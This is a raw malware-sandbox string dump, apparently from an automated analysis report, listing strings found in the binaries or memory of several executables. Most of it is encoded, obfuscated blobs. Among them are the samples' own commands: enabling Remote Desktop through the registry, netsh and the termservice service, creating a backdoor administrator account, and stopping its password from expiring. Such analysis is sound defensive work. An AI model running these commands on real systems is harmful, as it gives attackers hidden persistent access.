vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000010.00000003.1782574386.0000000005060000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: net start termservice
Source: rapes.exe, 00000010.00000003.1782574386.0000000005060000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: nhDLtPT.exe; String found in binary or memory: net start termservice
Source: nhDLtPT.exe, 00000014.00000000.1879098792.0000000000C01000.00000002.00000001.01000000.00000011.sdmp; String found in binary or memory: net start termservice
Source: nhDLtPT.exe, 00000014.00000000.1879098792.0000000000C01000.00000002.00000001.01000000.00000011.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ 
k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: nhDLtPT.exe, 00000014.00000002.1886421735.0000000000C01000.00000002.00000001.01000000.00000011.sdmp | String found in binary or memory: net start termservice
                                                Source: nhDLtPT.exe, 00000014.00000002.1886421735.0000000000C01000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ 
k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: net start termservice
Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: nable=Yessc config termservice start= autonet start termservice" /add /y" "net user "" /addnet localgroup "Administrators" "'" SET PasswordExpires=FALSEWMIC USERACCOUNT WHERE "Name = ''" SET Passwordchangeable=FALSEw01--E'' -DestinationPath 'powershell -Command Expand-Archive -Path '%d
Source: Gxtuum.exe | String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000015.00000002.1888300853.0000000000D01000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: net start termservice
                                                Source: Gxtuum.exe, 00000015.00000002.1888300853.0000000000D01000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ 
k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000015.00000000.1885044491.0000000000D01000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: net start termservice
                                                Source: Gxtuum.exe, 00000015.00000000.1885044491.0000000000D01000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ 
